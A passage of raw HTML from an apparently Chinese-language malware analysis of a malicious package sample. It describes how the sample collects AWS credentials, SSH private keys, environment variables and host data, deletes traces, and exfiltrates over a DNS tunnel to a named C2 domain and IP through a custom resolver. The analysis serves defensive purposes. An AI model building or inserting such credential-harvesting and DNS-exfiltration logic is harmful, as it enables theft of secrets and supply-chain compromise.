清理调试继承参数，</span></span><span leaf="" style="text-indent: 0px;line-height: 25.6px;font-weight: bold;text-align: left;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="font-weight: normal;">unref()</span></span><span leaf="" style="text-indent: 0px;line-height: 25.6px;font-weight: bold;text-align: left;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="font-weight: normal;"> 避免父进程阻塞退出。</span></span></p><p dir="ltr" style="text-indent: 0px;line-height: 25.6px;margin-bottom: 0px;text-align: left;"><span leaf="" style="text-indent: 0px;line-height: 25.6px;font-weight: bold;text-align: left;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="font-size: 18px;font-weight: bold;">文件名哈希自检与行为分支：</span></span></p><p dir="ltr" style="text-indent: 0px;line-height: 25.6px;margin-bottom: 0px;text-align: left;"><span leaf="" style="text-indent: 0px;line-height: 25.6px;font-weight: bold;text-align: left;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="font-weight: normal;">样本在启动时会比对当前文件名哈希，决定是完整替换导出还是附加属性。</span></span></p><p dir="ltr" style="text-indent: 0px;line-height: 25.6px;margin-bottom: 0px;text-align: center;"><span leaf="" style="text-indent: 0px;line-height: 25.6px;font-weight: bold;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="font-weight: normal;"><img data-aistatus="1" class="rich_pages wxw-img" data-ratio="0.386046511627907" data-type="png" data-w="860" height="232" style="margin-left: 0px;margin-top: 0px;" width="602" data-imgfileid="100021344" src="https://wechat2rss.xlab.app/img-proxy/?k=ca2c9bec&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fsz_mmbiz_png%2F8z8bibAexaCIbib398XFKsffibTJy2JCXnQSRpfapiazqPnFg4hm79Q0ftOQ1Uia8FwSWCHTK9O8SgrCfUbOR7wy7RjZt6iceWgia4ZXbAf8Fgy03A%2F640%3Fwx_fmt%3Dpng%26from%3Dappmsg"/></span></span></p><p dir="ltr" style="text-indent: 0px;line-height: 25.6px;margin-bottom: 0px;text-align: left;"><span leaf="" style="text-indent: 0px;line-height: 25.6px;font-weight: bold;text-align: left;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="font-weight: normal;">这一步通过路径差异触发不同执行面，增加通用签名覆盖难度。</span></span></p><p dir="ltr" style="text-indent: 0px;line-height: 25.6px;margin-bottom: 0px;text-align: left;"><span leaf="" style="text-indent: 0px;line-height: 25.6px;font-weight: bold;text-align: left;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="font-size: 18px;font-weight: bold;">凭据采集与打包：</span></span></p><p dir="ltr" style="text-indent: 0px;line-height: 25.6px;margin-bottom: 0px;text-align: left;"><span leaf="" style="text-indent: 0px;line-height: 25.6px;font-weight: bold;text-align: left;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="font-weight: normal;">采集阶段包含系统信息、环境变量与常见密钥路径，输出内容打包压缩后保存在临时目录，并在外传完成后清理。</span></span></p><p dir="ltr" style="text-indent: 0px;line-height: 25.6px;margin-bottom: 0px;text-align: center;"><span leaf="" style="text-indent: 0px;line-height: 25.6px;font-weight: bold;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="font-weight: normal;"><img class="rich_pages wxw-img" data-aistatus="1" data-imgfileid="100021345" data-ratio="0.4314574314574315" width="602" data-type="png" data-w="693" height="260" style="margin-left: 0px;margin-top: 0px;" src="https://wechat2rss.xlab.app/img-proxy/?k=e443bbe1&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fmmbiz_png%2F8z8bibAexaCI6owMrL9HwPvOtgIGe1250YuNPXdKfOUbc540n9DdnCNGAYl11o2BKUibbiboYwXfgRmwdPiawNQzzxhptRaBibhCVHFwyanvcsmQ%2F640%3Fwx_fmt%3Dpng%26from%3Dappmsg"/></span></span></p><p dir="ltr" style="text-indent: 0px;line-height: 25.6px;margin-bottom: 0px;text-align: left;"><span leaf="" style="text-indent: 0px;line-height: 25.6px;font-weight: bold;text-align: left;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="font-weight: normal;">采集项对应的危害如下：</span></span></p><ul class="list-paddingleft-1"><li><p dir="ltr" style="text-indent: 0px;line-height: 25.6px;margin-bottom: 0px;text-align: left;" role="presentation"><span leaf="" style="text-indent: 0px;line-height: 25.6px;font-weight: bold;text-align: left;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="font-weight: normal;">AWS 凭据(</span></span><span leaf="" style="text-indent: 0px;line-height: 25.6px;font-weight: bold;text-align: left;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="font-weight: normal;">~/.aws/credentials)</span></span><span leaf="" style="text-indent: 0px;line-height: 25.6px;font-weight: bold;text-align: left;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="font-weight: normal;">：可被用于接管受害者云账户，创建计算资源、访问 S3 存储桶或在云环境中横向移动。</span></span></p></li><li><p dir="ltr" style="text-indent: 0px;line-height: 25.6px;margin-bottom: 0px;text-align: left;" role="presentation"><span leaf="" style="text-indent: 0px;line-height: 25.6px;font-weight: bold;text-align: left;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="font-weight: normal;">SSH 私钥(</span></span><span leaf="" style="text-indent: 0px;line-height: 25.6px;font-weight: bold;text-align: left;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="font-weight: normal;">~/.ssh/id_rsa)</span></span><span leaf="" style="text-indent: 0px;line-height: 25.6px;font-weight: bold;text-align: left;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="font-weight: normal;">：可被用于免密登录受害者管理的服务器，实现内网渗透与持久化。</span></span></p></li><li><p dir="ltr" style="text-indent: 0px;line-height: 25.6px;margin-bottom: 0px;text-align: left;" role="presentation"><span leaf="" style="text-indent: 0px;line-height: 25.6px;font-weight: bold;text-align: left;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="font-weight: normal;">系统环境变量(</span></span><span leaf="" style="text-indent: 0px;line-height: 25.6px;font-weight: bold;text-align: left;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="font-weight: normal;">process.env)</span></span><span leaf="" style="text-indent: 0px;line-height: 25.6px;font-weight: bold;text-align: left;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="font-weight: normal;">：CI/CD 环境中常包含 npm token、Docker Hub 密码、数据库连接串等敏感信息，泄露后可直接导致更多供应链环节沦陷。</span></span></p></li><li><p dir="ltr" style="text-indent: 0px;line-height: 25.6px;margin-bottom: 0px;text-align: left;" role="presentation"><span leaf="" style="text-indent: 0px;line-height: 25.6px;font-weight: bold;text-align: left;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="font-weight: normal;">主机指纹与 hosts 文件(</span></span><span leaf="" style="text-indent: 0px;line-height: 25.6px;font-weight: bold;text-align: left;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="font-weight: normal;">uname -a</span></span><span leaf="" style="text-indent: 0px;line-height: 25.6px;font-weight: bold;text-align: left;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="font-weight: normal;">、</span></span><span leaf="" style="text-indent: 0px;line-height: 25.6px;font-weight: bold;text-align: left;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="font-weight: normal;">/etc/hosts)</span></span><span leaf="" style="text-indent: 0px;line-height: 25.6px;font-weight: bold;text-align: left;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="font-weight: normal;">：帮助攻击者识别高价值目标并绘制内网拓扑。</span></span></p></li><li><p dir="ltr" style="text-indent: 0px;line-height: 25.6px;margin-bottom: 0px;text-align: left;" role="presentation"><span leaf="" style="text-indent: 0px;line-height: 25.6px;font-weight: bold;text-align: left;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="font-weight: normal;">临时文件清理</span></span><span leaf="" style="text-indent: 0px;line-height: 25.6px;font-weight: bold;text-align: left;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="font-weight: normal;">（第 9 行 </span></span><span leaf="" style="text-indent: 0px;line-height: 25.6px;font-weight: bold;text-align: left;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="font-weight: normal;">unlinkSync</span></span><span leaf="" style="text-indent: 0px;line-height: 25.6px;font-weight: bold;text-align: left;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="font-weight: normal;">）：外传完成后自动删除本地压缩包，消除取证痕迹。</span></span></p></li></ul><p dir="ltr" style="text-indent: 0px;line-height: 25.6px;margin-bottom: 0px;text-align: left;"><span leaf="" style="text-indent: 0px;line-height: 25.6px;font-weight: bold;text-align: left;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="font-size: 18px;font-weight: bold;">DNS 隧道外传与加密签名：</span></span></p><b style="font-weight:normal;" data-pm-slice="0 0 []"><p dir="ltr" style="text-indent: 0px;line-height: 25.6px;margin-bottom: 0px;text-align: left;"><span leaf="" style="text-indent: 0px;line-height: 25.6px;font-weight: bold;text-align: left;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="font-weight: normal;">恶意代码在完成凭据收集后，并未使用常见的 HTTP/HTTPS 通道回传数据，而是采用 DNS 隧道策略实现隐蔽外传。其工作流程为：将目标内容打包为 tar.gz 压缩归档，对压缩结果进行编码与签名，再将数据切分为多个 DNS 分片，拼接为超长 FQDN (Fully Qualified Domain Name) 发起查询。</span></span></p><p dir="ltr" style="text-indent: 0px;line-height: 25.6px;margin-bottom: 0px;text-align: left;"><span leaf="" style="text-indent: 0px;line-height: 25.6px;font-weight: bold;text-align: left;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="font-weight: normal;">完整的外传链路可概括为：收集敏感数据 → 生成压缩归档 → 签名与分片 → 将分片嵌入查询名 → 使用自定义 DNS Resolver 直接向攻击者控制的 DNS 基础设施发送 TXT、A、AAAA 查询 → 服务端接收并重组还原。</span></span></p><p dir="ltr" style="text-indent: 0px;line-height: 25.6px;margin-bottom: 0px;text-align: center;"><span leaf="" style="text-indent: 0px;line-height: 25.6px;font-weight: bold;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="font-weight: normal;"><img class="rich_pages wxw-img" data-aistatus="1" data-imgfileid="100021355" data-ratio="1.4155597722960152" data-type="png" data-w="1054" height="852" width="602" style="margin-left: 0px; margin-top: 0px; pointer-events: initial;" src="https://wechat2rss.xlab.app/img-proxy/?k=adcf347d&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fsz_mmbiz_png%2F8z8bibAexaCLyjoc6hlk1pOjwk2FDtSEg0Bjicdy5deiaJvlcaFzYUC8yO6MicEQNszvxVrlWcRIgiakF5tuYpZHSBFpuSPibS9bLbNZiabnND9tTI%2F640%3Fwx_fmt%3Dpng%26from%3Dappmsg"/></span></span></p><p dir="ltr" style="text-indent: 0px;line-height: 25.6px;margin-bottom: 0px;text-align: left;"><span leaf="" style="text-indent: 0px;line-height: 25.6px;font-weight: bold;text-align: left;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="font-weight: normal;">与依赖企业内部 DNS 或公共递归解析器的传统 DNS 通信不同，该样本会自行指定解析目标，因此查询内容本身就是外传载荷，恶意 DNS 服务器同时充当 C2 与数据接收器，具备更强的隐蔽性与绕过能力。</span></span></p><p dir="ltr" style="text-indent: 0px;line-height: 25.6px;margin-bottom: 0px;text-align: center;"><span leaf="" style="text-indent: 0px;line-height: 25.6px;font-weight: bold;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="font-weight: normal;"><img class="rich_pages wxw-img" data-aistatus="1" data-imgfileid="100021354" data-ratio="0.4458464773922187" width="602" data-type="png" data-w="951" height="268" style="margin-left:0px;margin-top:0px;" src="https://wechat2rss.xlab.app/img-proxy/?k=c088e018&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fsz_mmbiz_png%2F8z8bibAexaCJp5YEBKXnBdybblnIZnWgqhGqTXCyzyw8ChjzQVMR5DHDjhl2wWq461ma0NC2aX3poMVBkict0e2bWfp5J9Ah4AsWmLSdI7jxE%2F640%3Fwx_fmt%3Dpng%26from%3Dappmsg"/></span></span></p><p dir="ltr" style="text-indent: 0px;line-height: 25.6px;margin-bottom: 0px;text-align: left;"><span leaf="" style="text-indent: 0px;line-height: 25.6px;font-weight: bold;text-align: left;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="font-weight: normal;">在具体实现上，样本会先使用 1.1.1.1 作为主 DNS、8.8.8.8 作为备用 DNS，解析 </span></span><span leaf="" style="text-indent: 0px;line-height: 25.6px;font-weight: bold;text-align: left;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="font-weight: normal;">sh.azurestaticprovider.net</span></span><span leaf="" style="text-indent: 0px;line-height: 25.6px;font-weight: bold;text-align: left;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="font-weight: normal;"> 以获取 C2 服务器 IP 地址；获得结果后，再将解析器直接指向该 IP（如 </span></span><span leaf="" style="text-indent: 0px;line-height: 25.6px;font-weight: bold;text-align: left;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="font-weight: normal;">resolver.setServers([&#39;37.16.75.69&#39;])</span></span><span leaf="" style="text-indent: 0px;line-height: 25.6px;font-weight: bold;text-align: left;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="font-weight: normal;">）。</span></span></p><p dir="ltr" style="text-indent: 0px;line-height: 25.6px;margin-bottom: 0px;text-align: left;"><span leaf="" style="text-indent: 0px;line-height: 25.6px;font-weight: bold;text-align: left;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="font-weight: normal;">需要特别说明的是，源码中经解码得到的 </span></span><span leaf="" style="text-indent: 0px;line-height: 25.6px;font-weight: bold;text-align: left;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="font-weight: normal;">bt.node.js</span></span><span leaf="" style="text-indent: 0px;line-height: 25.6px;font-weight: bold;text-align: left;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="font-weight: normal;"> 并非落地文件名、压缩包名或额外载荷，而是恶意 DNS 基础设施的入口主机名来源：其值写入 </span></span><span leaf="" style="text-indent: 0px;line-height: 25.6px;font-weight: bold;text-align: left;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="font-weight: normal;">_0x501a65[&#34;r&#34;]</span></span><span leaf="" style="text-indent: 0px;line-height: 25.6px;font-weight: bold;text-align: left;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="font-weight: normal;"> 后，经 </span></span><span leaf="" style="text-indent: 0px;line-height: 25.6px;font-weight: bold;text-align: left;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="font-weight: normal;">_0x30607f()</span></span><span leaf="" style="text-indent: 0px;line-height: 25.6px;font-weight: bold;text-align: left;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="font-weight: normal;"> 规范化、再由 </span></span><span leaf="" style="text-indent: 0px;line-height: 25.6px;font-weight: bold;text-align: left;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="font-weight: normal;">_0x348210()</span></span><span leaf="" style="text-indent: 0px;line-height: 25.6px;font-weight: bold;text-align: left;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="font-weight: normal;"> 取回最终地址，最终传入 </span></span><span leaf="" style="text-indent: 0px;line-height: 25.6px;font-weight: bold;text-align: left;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="font-weight: normal;">dns.promises.Resolver</span></span><span leaf="" style="text-indent: 0px;line-height: 25.6px;font-weight: bold;text-align: left;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="font-weight: normal;"> 作为自定义解析服务器。样本随后围绕同一分片数据依次尝试 </span></span><span leaf="" style="text-indent: 0px;line-height: 25.6px;font-weight: bold;text-align: left;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="font-weight: normal;">resolveTxt</span></span><span leaf="" style="text-indent: 0px;line-height: 25.6px;font-weight: bold;text-align: left;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="font-weight: normal;">、</span></span><span leaf="" style="text-indent: 0px;line-height: 25.6px;font-weight: bold;text-align: left;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="font-weight: normal;">resolve4</span></span><span leaf="" style="text-indent: 0px;line-height: 25.6px;font-weight: bold;text-align: left;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="font-weight: normal;"> 和 </span></span><span leaf="" style="text-indent: 0px;line-height: 25.6px;font-weight: bold;text-align: left;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="font-weight: normal;">resolve6</span></span><span leaf="" style="text-indent: 0px;line-height: 25.6px;font-weight: bold;text-align: left;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="font-weight: normal;">，以提升在受限网络环境中的传输成功率。</span></span></p></b><p dir="ltr" style="text-indent: 0px;line-height: 25.6px;margin-bottom: 0px;text-align: left;"><span leaf="" style="text-indent: 0px;line-height: 25.6px;font-weight: bold;text-align: left;background-color: rgb(255, 255, 255);color: 